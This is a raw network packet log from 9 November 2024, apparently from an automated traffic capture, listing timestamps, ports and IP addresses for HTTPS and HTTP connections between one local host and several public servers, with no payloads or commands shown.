Nov 9, 2024 02:47:34.750819921 CET	53035	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.750828028 CET	443	53035	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.751684904 CET	53034	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.751698971 CET	443	53034	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.752157927 CET	443	53037	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.752254963 CET	53034	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.752259970 CET	443	53034	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.752393961 CET	53037	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.752413034 CET	443	53037	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.752789974 CET	53040	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.752804995 CET	443	53040	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.753206015 CET	53040	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.753211021 CET	443	53040	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.753458977 CET	443	53037	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.753530025 CET	53037	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.753817081 CET	53037	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.753878117 CET	443	53037	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.753998041 CET	53037	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.754004955 CET	443	53037	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.757373095 CET	443	53033	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.761980057 CET	443	53039	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.764372110 CET	443	53038	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.765052080 CET	53039	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.765060902 CET	443	53039	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.765460014 CET	53038	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.765469074 CET	443	53038	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.765516043 CET	443	53039	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.765850067 CET	443	53038	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.766028881 CET	53039	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.766109943 CET	443	53039	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.766361952 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.766372919 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.766395092 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.766410112 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.766423941 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.766436100 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.766448975 CET	53029	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.766458988 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.766467094 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.766485929 CET	53029	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.766498089 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.766536951 CET	53029	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.766551971 CET	53029	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.768394947 CET	443	53036	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.768987894 CET	53039	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.769227982 CET	53036	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.769234896 CET	443	53036	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.770059109 CET	53038	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.770145893 CET	443	53038	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.770209074 CET	53038	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.770210981 CET	443	53036	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.770263910 CET	53036	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.770849943 CET	53036	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.770906925 CET	443	53036	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.771209955 CET	53036	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.771215916 CET	443	53036	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.772975922 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.772984028 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.772996902 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.773004055 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.773010969 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.773022890 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.773030043 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.773036003 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.773049116 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.773055077 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.773063898 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.773065090 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.773118019 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.773149967 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.773256063 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.773262024 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.773262978 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.773276091 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.773281097 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.773288012 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.773293972 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.773305893 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.773308992 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.773318052 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.773324013 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.773333073 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.773338079 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.773350954 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.773354053 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.773384094 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.773411036 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.774029970 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774035931 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774049997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774090052 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.774202108 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774214983 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774221897 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774228096 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774234056 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774245024 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.774245977 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774270058 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774276018 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774281979 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.774281979 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774288893 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774296045 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774302006 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774308920 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774308920 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.774316072 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774322987 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774329901 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774332047 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.774353027 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.774369955 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.774673939 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774681091 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774693012 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774715900 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774724007 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774729967 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774733067 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.774744034 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774759054 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.774761915 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774770975 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774774075 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.774776936 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774785042 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774791002 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774804115 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.774805069 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774812937 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774820089 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774827957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.774842978 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.774864912 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.774878025 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.778645039 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778669119 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778671980 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778677940 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778680086 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778687000 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778700113 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778704882 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778712034 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778717995 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778729916 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778736115 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778743982 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778748989 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778760910 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.778762102 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778790951 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778800964 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.778805971 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778812885 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778812885 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.778840065 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778847933 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778856039 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.778861046 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778870106 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778877020 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778879881 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778892994 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.778903961 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778909922 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778917074 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778920889 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.778922081 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778928995 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778935909 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778947115 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.778950930 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778969049 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778980970 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.778980970 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779007912 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779016972 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779022932 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779023886 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779031992 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779043913 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779050112 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779056072 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779057026 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779062033 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779067993 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779073954 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779084921 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779086113 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779102087 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779109955 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779113054 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779133081 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779136896 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779141903 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779154062 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779161930 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779166937 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779175997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779181957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779186964 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779189110 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779201984 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779208899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779215097 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779223919 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779230118 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779234886 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779238939 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779263973 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779266119 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779272079 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779278994 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779284954 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779289961 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779290915 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779299021 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779305935 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779315948 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779320955 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779328108 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779334068 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779340029 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779342890 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779345989 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779361963 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779365063 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779370070 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779371977 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779383898 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779397011 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779401064 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779405117 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779418945 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779426098 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779431105 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779437065 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779438019 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779444933 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779464960 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779496908 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779500008 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779504061 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779520988 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779526949 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779539108 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779546022 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779550076 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779552937 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779567957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779573917 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779576063 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779581070 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779587984 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779598951 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779598951 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779620886 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779648066 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779653072 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779654980 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779661894 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779673100 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779678106 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779694080 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779700041 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779700041 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779707909 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779712915 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779722929 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779726028 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779733896 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779742002 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779742956 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779748917 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779764891 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779783964 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779791117 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779793024 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779798031 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779803991 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779810905 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779836893 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779853106 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779887915 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779895067 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779906034 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779911995 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779918909 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779932976 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.779942989 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779963017 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.779982090 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.780122995 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.780131102 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.780142069 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.780148983 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.780154943 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.780170918 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.780183077 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.780204058 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.780210018 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.780213118 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.780215025 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.780222893 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.780229092 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.780236006 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.780251026 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.780251980 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.780267000 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.780273914 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.780278921 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.780280113 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.780311108 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.780313015 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.780322075 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.780333042 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.780359983 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.788477898 CET	443	53041	3.167.152.61	192.168.2.7
Nov 9, 2024 02:47:34.793401003 CET	53041	443	192.168.2.7	3.167.152.61
Nov 9, 2024 02:47:34.793411970 CET	443	53041	3.167.152.61	192.168.2.7
Nov 9, 2024 02:47:34.793988943 CET	443	53041	3.167.152.61	192.168.2.7
Nov 9, 2024 02:47:34.794459105 CET	53041	443	192.168.2.7	3.167.152.61
Nov 9, 2024 02:47:34.794573069 CET	443	53041	3.167.152.61	192.168.2.7
Nov 9, 2024 02:47:34.794672966 CET	53041	443	192.168.2.7	3.167.152.61
Nov 9, 2024 02:47:34.801752090 CET	53033	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.801764965 CET	443	53033	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.802521944 CET	53033	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.802526951 CET	443	53033	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.805006027 CET	53029	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:34.805021048 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:34.811336040 CET	443	53039	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.811348915 CET	443	53038	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.835333109 CET	443	53041	3.167.152.61	192.168.2.7
Nov 9, 2024 02:47:34.877382994 CET	53038	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.880863905 CET	443	53040	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.880925894 CET	443	53040	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.881813049 CET	443	53035	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.881879091 CET	443	53035	13.107.246.57	192.168.2.7
